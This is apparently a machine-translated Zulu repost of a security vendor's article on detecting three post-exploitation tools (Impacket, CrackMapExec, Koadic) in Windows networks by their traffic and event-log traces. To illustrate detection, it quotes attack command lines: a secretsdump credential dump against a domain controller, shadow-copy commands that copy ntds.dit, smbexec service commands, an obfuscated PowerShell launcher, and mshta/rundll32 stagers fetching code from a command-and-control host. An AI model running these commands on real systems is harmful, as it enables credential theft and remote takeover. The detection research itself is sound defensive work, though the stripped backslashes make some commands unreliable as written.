I-ProHoster > Π‘Π»ΠΎΠ³ > Ukuphatha > Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker

Inani lokuhlaselwa emkhakheni wezinkampani likhula minyaka yonke: isibonelo ngo-2017, kwaqoshwa izehlakalo eziyingqayizivele ezingu-13%. kunango-2016, futhi ekupheleni kuka-2018 - 27% ngaphezulu izehlakalokunasenkathini edlule. Kubandakanya lezo lapho ithuluzi eliyinhloko lokusebenza kuyisistimu yokusebenza yeWindows. Ngo-2017-2018, i-APT Dragonfly, APT28, I-APT MuddyWater yenze ukuhlasela kuhulumeni nezinhlangano zamasosha eYurophu, eNyakatho Melika naseSaudi Arabia. Futhi sisebenzise amathuluzi amathathu kulokhu - Impacket, I-CrackMapExec ΠΈ I-Koadic. Ikhodi yabo yomthombo ivuliwe futhi iyatholakala ku-GitHub.

Kuyaphawuleka ukuthi lawa mathuluzi awasetshenziselwa ukungena kokuqala, kodwa ukuthuthukisa ukuhlasela ngaphakathi kwengqalasizinda. Abahlaseli bawasebenzisa ezigabeni ezihlukene zokuhlasela kulandela ukungena kwepherimitha. Lokhu, ngendlela, kunzima ukukubona futhi ngokuvamile kuphela ngosizo lobuchwepheshe ukuhlonza iminonjana yokonakala kuthrafikhi yenethiwekhi noma amathuluzi avumela thola izenzo ezisebenzayo zomhlaseli ngemva kokuba engene nengqalasizinda. Amathuluzi ahlinzeka ngemisebenzi ehlukahlukene, kusukela ekudluliseni amafayela kuya ekusebenzelaneni nesibhalisi nokwenza imiyalo emshinini oqhelile. Senze ucwaningo lwalawa mathuluzi ukuze sithole umsebenzi wawo wenethiwekhi.

Okwakufanele sikwenze:

  • Qonda ukuthi amathuluzi okugenca asebenza kanjani. Thola ukuthi yini abahlaseli okudingeka bayisebenzise nokuthi ibuphi ubuchwepheshe abangabusebenzisa.
  • Thola okungatholwanga amathuluzi okuvikela ulwazi ezigabeni zokuqala zokuhlasela. Isigaba sokuhlola singase seqiwe, mhlawumbe ngenxa yokuthi umhlaseli ungumhlaseli wangaphakathi, noma ngenxa yokuthi umhlaseli usebenzisa imbobo engqalasizinda ebingaziwa ngaphambilini. Kuba nokwenzeka ukubuyisela lonke uchungechunge lwezenzo zakhe, yingakho isifiso sokubona ukunyakaza okuqhubekayo.
  • Susa amanga kumathuluzi okuthola ukungena. Akufanele sikhohlwe ukuthi lapho izenzo ezithile zitholwa ngesisekelo sokuhlola kuphela, amaphutha avamile angenzeka. Ngokujwayelekile kwingqalasizinda kunezinombolo ezanele zezindlela, ezingehlukaniseki nezisemthethweni ekuboneni kuqala, ukuthola noma yiluphi ulwazi.

La mathuluzi abanika ini abahlaseli? Uma lokhu kuyi-Impacket, abahlaseli bathola umtapo wezincwadi omkhulu wamamojula angasetshenziswa ezigabeni ezihlukene zokuhlasela okulandelayo ngemva kokuphula umjikelezo. Amathuluzi amaningi asebenzisa amamojula e-Impacket ngaphakathi - isibonelo, i-Metasploit. Ine-dcomexec ne-wmiexec yokukhishwa komyalo okude, i-secretdump yokuthola ama-akhawunti ekhanda angezwe ku-Impacket. Ngenxa yalokho, ukutholwa okufanele komsebenzi womtapo wolwazi onjalo kuzoqinisekisa ukutholwa kokuphuma kokunye.

Akumane kwaqondana ukuthi abadali babhale ukuthi β€œPowered by Impacket” mayelana ne-CrackMapExec (noma i-CME nje). Ngaphezu kwalokho, i-CME inokusebenza osekwenziwe ngomumo kwezimo ezidumile: i-Mimikatz yokuthola amagama ayimfihlo noma ama-hashes awo, ukuqaliswa kwe-Meterpreter noma i-ejenti yoMbuso ukuze kubulawe ukude, kanye ne-Bloodhound ebhodini.

Ithuluzi lesithathu esilikhethile kwakuyi-Koadic. Kusanda kwenzeka, yethulwa engqungqutheleni yabaduni bamazwe ngamazwe i-DEFCON 25 ngo-2017 futhi ihlukaniswa ngendlela engeyona ejwayelekile: isebenza nge-HTTP, i-Java Script kanye ne-Microsoft Visual Basic Script (VBS). Le ndlela ibizwa ngokuthi ukuphila ngaphandle komhlaba: ithuluzi lisebenzisa isethi yokuncika kanye nemitapo yolwazi eyakhelwe ku-Windows. Abadali bayibiza nge-COM Command & Control, noma i-C3.

IMPACKET

Ukusebenza kwe-Impacket kubanzi kakhulu, kusukela ekuhloleni kabusha ngaphakathi kwe-AD kanye nokuqoqa idatha kusuka kumaseva angaphakathi e-MS SQL, kuya kumasu okuthola izifakazelo: lokhu ukuhlasela kwe-SMB edluliselwe, kanye nokuthola ifayela elithi ntds.dit eliqukethe ama-hashes amaphasiwedi omsebenzisi avela kusilawuli sesizinda. I-Impacket iphinde isebenzise imiyalo ukude isebenzisa izindlela ezine ezihlukene: I-WMI, Isevisi Yokuphatha Isihleli Se-Windows, i-DCOM, ne-SMB, futhi idinga imininingwane yokwenza kanjalo.

Ukulahla okuyimfihlo

Ake sibheke i-secretdump. Lena imojuli engakhomba kokubili imishini yabasebenzisi nezilawuli zesizinda. Ingasetshenziselwa ukuthola amakhophi ezindawo zenkumbulo LSA, SAM, SECURITY, NTDS.dit, ukuze ibonakale ezigabeni ezihlukene zokuhlasela. Isinyathelo sokuqala ekusebenzeni kwemojuli ukuqinisekiswa nge-SMB, okudinga iphasiwedi yomsebenzisi noma i-hash yayo ukuze yenze ngokuzenzakalelayo ukuhlasela kwe-Hash. Okulandelayo kuza isicelo sokuvula ukufinyelela kuMphathi Wokulawula Isevisi (SCM) futhi uthole ukufinyelela kurejista usebenzisa iphrothokholi ye-winreg, lapho umhlaseli angathola khona idatha yamagatsha athakaselayo futhi athole imiphumela nge-SMB.

Emfanekisweni. 1 sibona ukuthi uma usebenzisa iphrothokholi ye-winreg, ukufinyelela kutholwa kusetshenziswa ukhiye wokubhalisa nge-LSA. Ukuze wenze lokhu, sebenzisa umyalo we-DCERPC nge-opcode 15 - OpenKey.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 1. Ukuvula ukhiye wokubhalisa usebenzisa iphrothokholi ye-winreg

Okulandelayo, lapho ukufinyelela kukhiye kutholwa, amanani agcinwa ngomyalo we-SaveKey nge-opcode 20. I-Impacket yenza lokhu ngendlela eqondile. Ilondoloza amanani efayeleni igama lalo liwuchungechunge lwezinhlamvu ezingahleliwe ezingu-8 ezixhunywe ngokuthi .tmp. Ukwengeza, ukulayishwa okwengeziwe kwaleli fayela kwenzeka nge-SMB kusukela kuhla lwemibhalo lwe-System32 (Fig. 2).

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 2. Uhlelo lokuthola ukhiye wokubhalisa emshinini oqhelile

Kuvela ukuthi umsebenzi onjalo kunethiwekhi ungatholwa ngemibuzo emagatsheni athile okubhalisa usebenzisa iphrothokholi ye-winreg, amagama athile, imiyalo nokuhleleka kwawo.

Le mojula iphinde ishiye imikhondo kulogi yomcimbi ye-Windows, ikwenze kube lula ukuyibona. Isibonelo, njengomphumela wokwenza umyalo

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Kulogi yeWindows Server 2016 sizobona ukulandelana kokhiye okulandelayo kwemicimbi:

1. 4624 - I-Logon ekude.
2. 5145 - ukuhlola amalungelo okufinyelela kusevisi ekude ye-winreg.
3. 5145 - ukuhlola amalungelo okufinyelela ifayela ohlwini lwemibhalo lwe-System32. Ifayela linegama elingahleliwe elishiwo ngenhla.
4. 4688 - ukudala inqubo ye-cmd.exe eyethula i-vsadmin:

β€œC:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukudala inqubo ngomyalo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - ukudala inqubo ngomyalo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - ukudala inqubo ngomyalo:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Njengamathuluzi amaningi angemuva kokuxhashazwa, i-Impacket inamamojula okusebenzisa imiyalo ukude. Sizogxila ku-smbexec, ehlinzeka ngegobolondo lomyalo osebenzayo emshinini wesilawuli kude. Le mojula futhi idinga ukuqinisekiswa nge-SMB, kungaba nephasiwedi noma i-hashi yephasiwedi. Emfanekisweni. Emfanekisweni wesi-3 sibona isibonelo sendlela ithuluzi elinjalo elisebenza ngayo, kulokhu i-console yomlawuli wendawo.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 3. Interactive smbexec console

Isinyathelo sokuqala se-smbexec ngemva kokufakazela ubuqiniso ukuvula i-SCM ngomyalo we-OpenSCManagerW (15). Umbuzo uyaphawuleka: inkambu ye-MachineName ithi DUMMY.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 4. Isicelo sokuvula Umphathi Wokulawula Isevisi

Okulandelayo, isevisi yenziwa kusetshenziswa umyalo we-CreateServiceW (12). Endabeni ye-smbexec, singabona umqondo ofanayo wokwakha umyalo njalo. Emfanekisweni. 5 oluhlaza ukhombisa amapharamitha womyalo angaguquleki, ophuzi ukhombisa lokho umhlaseli angakushintsha. Kulula ukubona ukuthi igama lefayela elisebenzisekayo, umkhombandlela walo kanye nefayela eliphumayo lingashintshwa, kodwa okunye kunzima kakhulu ukukushintsha ngaphandle kokuphazamisa i-logic ye-Impacket module.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 5. Isicelo sokwenza isevisi usebenzisa Umphathi Wokulawula Isevisi

I-Smbexec iphinde ishiye imikhondo esobala kulogi lomcimbi weWindows. Kulogi yeWindows Server 2016 yegobolondo lomyalo osebenzisanayo nomyalo we-ipconfig, sizobona ukulandelana kokhiye okulandelayo kwemicimbi:

1. 4697 - ukufakwa kwenkonzo emshinini wesisulu:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - ukudalwa kwenqubo ye-cmd.exe ngezimpikiswano ezivela ephuzwini 1.
3. 5145 - ukuhlola amalungelo okufinyelela kufayela elithi __output ohlwini lwemibhalo C$.
4. 4697 - ukufakwa kwenkonzo emshinini wesisulu.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - ukudalwa kwenqubo ye-cmd.exe ngezimpikiswano ezivela ephuzwini 4.
6. 5145 - ukuhlola amalungelo okufinyelela kufayela elithi __output ohlwini lwemibhalo C$.

I-Impacket iyisisekelo sokuthuthukiswa kwamathuluzi okuhlasela. Isekela cishe wonke amaphrothokholi kungqalasizinda ye-Windows futhi ngesikhathi esifanayo inezici zayo zobuntu. Nazi izicelo ze-winreg ezithile, kanye nokusetshenziswa kwe-SCM API enokwakheka komyalo wesici, nefomethi yegama lefayela, kanye ne-SMB share SYSTEM32.

I-CRACKMAPEXEC

Ithuluzi le-CME lidizayinelwe ngokuyinhloko ukwenza ngokuzenzakalelayo lezo zenzo zenjwayelo okumele umhlaseli azenze ukuze athuthuke ngaphakathi kwenethiwekhi. Ikuvumela ukuthi usebenze ngokubambisana ne-ejenti ye-Empire eyaziwayo kanye ne-Meterpreter. Ukuze ikhiphe imiyalo ngokufihlekile, i-CME ingayifihla. Ngokusebenzisa i-Bloodhound (ithuluzi elihlukile lokuhlola), umhlaseli angenza usesho ngokuzenzekelayo kuseshini yomlawuli wesizinda esisebenzayo.

Bloodhound

I-Bloodhound, njengethuluzi elizimele, ivumela ukuqashelwa okuthuthukile ngaphakathi kwenethiwekhi. Iqoqa idatha emayelana nabasebenzisi, imishini, amaqembu, izikhathi futhi inikezwa njengombhalo we-PowerShell noma ifayela kanambambili. I-LDAP noma i-SMB-based protocol isetshenziselwa ukuqoqa ulwazi. Imojula yokuhlanganisa ye-CME ivumela i-Bloodhound ukuthi ilandwe emshinini wesisulu, isebenze futhi ithole idatha eqoqwe ngemva kokubulawa, ngaleyo ndlela izenzele izenzo kusistimu futhi izenze zingabonakali. Igobolondo lesithombe se-Bloodhound lethula idatha eqoqiwe ngendlela yamagrafu, ekuvumela ukuthi uthole indlela emfushane ukusuka emshinini womhlaseli ukuya kumphathi wesizinda.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 6. I-Bloodhound Interface

Ukuze isebenze emshinini wesisulu, imojuli idala umsebenzi isebenzisa i-ATSVC ne-SMB. I-ATSVC iyisixhumi esibonakalayo sokusebenza ne-Windows Task Scheduler. I-CME isebenzisa umsebenzi wayo we-NetrJobAdd(1) ukuze idale imisebenzi ngenethiwekhi. Isibonelo salokho okuthunyelwa imojula ye-CME kuboniswe ku-Fig. 7: Lena ikholi yomyalo we-cmd.exe kanye nekhodi efiphaziwe ngendlela yezimpikiswano ngefomethi ye-XML.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Fig.7. Ukudala umsebenzi nge-CME

Ngemuva kokuthi umsebenzi uhanjiswe ukuze ubulawe, umshini wesisulu uqala i-Bloodhound ngokwayo, futhi lokhu kungabonakala emgwaqeni. Imojula ibonakala ngemibuzo ye-LDAP ukuze kutholwe amaqembu ajwayelekile, uhlu lwayo yonke imishini nabasebenzisi esizindeni, nokuthola ulwazi mayelana nezikhathi zabasebenzisi abasebenzayo ngesicelo se-SRVSVC NetSessEnum.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 8. Ukuthola uhlu lwamaseshini asebenzayo nge-SMB

Ngaphezu kwalokho, ukwethulwa kwe-Bloodhound emshinini wesisulu ngokucwaningwa kwamabhuku kunikwe amandla kuhambisana nomcimbi one-ID 4688 (ukudala inqubo) kanye negama lenqubo. Β«C:WindowsSystem32cmd.exeΒ». Okuphawulekayo ngakho yizimpikiswano zomugqa womyalo:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

I-Enum_avproducts

Imojuli ye-enum_avproducts iyathakazelisa kakhulu ngokombono wokusebenza nokusebenza. I-WMI ikuvumela ukuthi usebenzise ulimi lombuzo lwe-WQL ukuze uthole idatha ezintweni ezihlukahlukene ze-Windows, okuyikhona okusetshenziswa yile mojula ye-CME. Idala imibuzo kumakilasi we-AntiSpywareProduct kanye ne-AntiМirusProduct mayelana namathuluzi okuvikela afakwe emshinini wesisulu. Ukuze uthole idatha edingekayo, imojula ixhuma ku-rootSecurityCenter2 namespace, bese ikhiqiza umbuzo we-WQL futhi ithola impendulo. Emfanekisweni. Umfanekiso 9 ukhombisa okuqukethwe yilezo zicelo nezimpendulo. Esibonelweni sethu, iWindows Defender itholakele.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 9. Umsebenzi wenethiwekhi wemojuli ye-enum_avproducts

Ngokuvamile, ukuhlolwa kwe-WMI (Trace WMI-Activity), imicimbi lapho ungathola khona ulwazi oluwusizo mayelana nemibuzo ye-WQL, kungase kukhutshazwe. Kodwa uma inikwe amandla, uma isikripthi se-enum_avproducts sisetshenziswa, umcimbi one-ID 11 uzolondolozwa. Uzoqukatha igama lomsebenzisi othumele isicelo kanye negama ku-rootSecurityCenter2 yegama.

Imojula ngayinye ye-CME ibinezinto zayo zobuciko, kungaba imibuzo ethile ye-WQL noma ukudalwa kohlobo oluthile lomsebenzi kusihleli somsebenzi esinokufiphala kanye nomsebenzi oqondene ne-Bloodhound ku-LDAP ne-SMB.

KOADIC

Isici esihlukile se-Koadic ukusetshenziswa kwabahumushi be-JavaScript kanye ne-VBScript eyakhelwe ku-Windows. Ngalo mqondo, ilandela ukuphila ngokuthambekela komhlaba - okungukuthi, ayinakho ukuncika kwangaphandle futhi isebenzisa amathuluzi ajwayelekile e-Windows. Leli ithuluzi le-Command & Control eligcwele (CnC), kusukela ngemuva kokutheleleka "i-implant" efakwe emshinini, evumela ukuthi ilawulwe. Umshini onjalo, egameni le-Koadic, ubizwa ngokuthi "zombie." Uma kukhona amalungelo anganele okusebenza okugcwele ohlangothini lwesisulu, i-Koadic inamandla okuwaphakamisa kusetshenziswa amasu okulawula i-Akhawunti Yomsebenzisi (i-UAC bypass).

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 10. Igobolondo le-Koadic

Umhlukumezi kufanele aqale ukuxhumana neseva ye-Command & Control. Ukuze enze lokhu, udinga ukuthintana ne-URI elungiselelwe ngaphambilini futhi athole umzimba oyinhloko we-Koadic esebenzisa esinye sesiteji. Emfanekisweni. Umfanekiso 11 ubonisa isibonelo se-mshta stager.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 11. Ukuqalisa iseshini ngeseva ye-CnC

Ngokusekelwe ekuhlukeni kwempendulo ye-WS, kuyacaca ukuthi ukusebenzisa kwenzeka nge-WScript.Shell, futhi okuguquguqukayo STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE aqukethe ulwazi olubalulekile mayelana namapharamitha weseshini yamanje. Leli ipheya lokuqala lempendulo yesicelo ekuxhumekeni kwe-HTTP ngeseva ye-CnC. Izicelo ezilandelayo zihlobene ngokuqondile nokusebenza kwamamojula abizwa ngokuthi amamojula (ama-implants). Wonke amamojula we-Koadic asebenza kuphela ngeseshini esebenzayo ne-CnC.

I-Mimikatz

Njengoba nje i-CME isebenza ne-Bloodhound, i-Koadic isebenza ne-Mimikatz njengohlelo oluhlukile futhi inezindlela eziningi zokuluqalisa. Ngezansi kunepheya yempendulo yesicelo yokulanda i-Mimikatz implant.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 12. Dlulisela i-Mimikatz ku-Koadic

Ungabona ukuthi ifomethi ye-URI esicelweni ishintshe kanjani. Manje iqukethe inani le-csrf variable, enesibopho semojula ekhethiwe. Unganaki igama lakhe; Sonke siyazi ukuthi i-CSRF ivamise ukuqondwa ngendlela ehlukile. Impendulo yayiwumzimba ofanayo oyinhloko we-Koadic, lapho ikhodi ehlobene ne-Mimikatz yengezwe khona. Yinkulu impela, ngakho-ke ake sibheke amaphuzu abalulekile. Lapha sinelabhulali ye-Mimikatz efakwe ikhodi ku-base64, isigaba se-serialized .NET esizoyijova, kanye nezimpikiswano zokuqalisa i-Mimikatz. Umphumela wokusebenzisa udluliselwa kunethiwekhi ngombhalo ocacile.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 13. Umphumela wokusebenzisa i-Mimikatz emshinini oqhelile

Exec_cmd

I-Koadic futhi inamamojula angakwazi ukusebenzisa imiyalo ukude. Lapha sizobona indlela efanayo yokukhiqiza i-URI kanye neziguquguqukayo ezijwayelekile ze-csrf. Endabeni ye-exec_cmd module, ikhodi yengezwa emzimbeni okwazi ukwenza imiyalo yegobolondo. Ngezansi kuboniswa ikhodi enjalo equkethwe kumpendulo ye-HTTP yeseva ye-CnC.

Ungakuthola kanjani ukuhlaselwa kwengqalasizinda yeWindows: ukufunda amathuluzi we-hacker
Ilayisi. 14. Faka ikhodi exec_cmd

Ukuhluka kwe-GAWTUUGCFI okunesibaluli esijwayelekile se-WS kuyadingeka ukuze kwenziwe ikhodi. Ngosizo lwayo, i-implant ibiza igobolondo, icubungula amagatsha amabili ekhodi - i-shell.exec ngokubuyiswa kokusakaza kwedatha okukhiphayo kanye ne-shell.run ngaphandle kokubuya.

I-Koadic ayilona ithuluzi elijwayelekile, kodwa inama-artifact ayo engatholakala ngawo kuthrafikhi esemthethweni:

  • ukwakheka okukhethekile kwezicelo ze-HTTP,
  • usebenzisa i-winHttpRequests API,
  • ukudala into ye-WScript.Shell nge-ActiveXObject,
  • umzimba omkhulu osebenzisekayo.

Ukuxhumana kokuqala kuqalwa yi-stager, ngakho-ke kungenzeka ukuthola umsebenzi wayo ngemicimbi yeWindows. Ku-mshta, lo umcimbi 4688, okhombisa ukudalwa kwenqubo enesici sokuqala:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Ngenkathi i-Koadic isebenza, ungabona eminye imicimbi engu-4688 enezimpawu ezibonisa kahle:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

okutholakele

Ukuziphilisa ngokuphila ngokudla komhlaba kuya ngokuduma ezigebengwini. Basebenzisa amathuluzi nezindlela ezakhelwe ku-Windows ngezidingo zabo. Sibona amathuluzi adumile i-Koadic, i-CrackMapExec ne-Impacket elandela lesi simiso ngokwandayo evela emibikweni ye-APT. Inombolo yezimfoloko ku-GitHub kulawa mathuluzi nayo iyakhula, futhi kuvela amasha (sekuvele cishe inkulungwane yawo manje). Lo mkhuba uzuza ukuduma ngenxa yobulula bawo: abahlaseli abawadingi amathuluzi ezinkampani zangaphandle; sebevele besemishinini yezisulu futhi babasiza ukuba badlule izinyathelo zokuphepha. Sigxila ekutadisheni ukuxhumana kwenethiwekhi: ithuluzi ngalinye elichazwe ngenhla lishiya iminonjana yalo kuthrafikhi yenethiwekhi; ukufunda okuningiliziwe ngazo kusivumele ukuthi sifundise umkhiqizo wethu I-PT Network Attack Discovery ukuzibona, okusiza ekugcineni ukuphenya lonke uchungechunge lwezigameko ze-inthanethi ezibabandakanyayo.

Ababhali:

  • U-Anton Tyurin, iNhloko yoMnyango Wezinsizakalo Zochwepheshe, Isikhungo Sezokuphepha Sochwepheshe be-PT, I-Positive Technologies
  • U-Egor Podmokov, uchwepheshe, Isikhungo Sezokuphepha Sochwepheshe se-PT, Ubuchwepheshe obuPositive

Source: www.habr.com

Engeza amazwana